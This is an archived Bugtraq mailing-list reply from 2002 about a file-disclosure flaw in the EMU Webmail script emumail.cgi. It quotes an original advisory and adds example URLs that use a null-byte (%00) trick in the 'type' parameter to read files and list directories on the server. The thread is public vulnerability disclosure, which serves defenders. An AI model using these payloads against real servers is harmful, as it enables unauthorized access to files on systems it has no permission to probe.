[24981] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: emumail.cgi

daemon@ATHENA.MIT.EDU (N|ghtHawk)
Fri Apr 5 18:35:01 2002

Message-ID: <006601c1dc36$541520a0$2a01a8c0@Asby.multiweb.nl>
Reply-To: "N|ghtHawk" <nighthawk@hackers4hackers.nl>
From: "N|ghtHawk" <nighthawk@hackers4hackers.nl>
To: <bugtraq@securityfocus.org>
Date:   Fri, 5 Apr 2002 02:10:42 +0200
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

>name            : emumail.cgi
>date            : 04/04/2002
>description     : EMU Webmail: how to check your email
>from the web. 
>severity        : Low/average-risk
>homepage        : www.emumail.com
>
>Any user can view files on the remote system:
>xxx/PATH/emumail.cgi?type=FILE%00
>
>
>
>The vendor were contact about that
>

http://site/emumail.cgi?type=.%00

Seems to give the directory index of the current directory.

http://site/emumail.cgi?type=..%00

Seems to give the directory index of ../

-- 
N|ghtHawk
http://www.hackers4hackers.org


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[24981] in bugtraq

Re: emumail.cgi

daemon@ATHENA.MIT.EDU (N|ghtHawk)Fri Apr 5 18:35:01 2002

daemon@ATHENA.MIT.EDU (N|ghtHawk)
Fri Apr 5 18:35:01 2002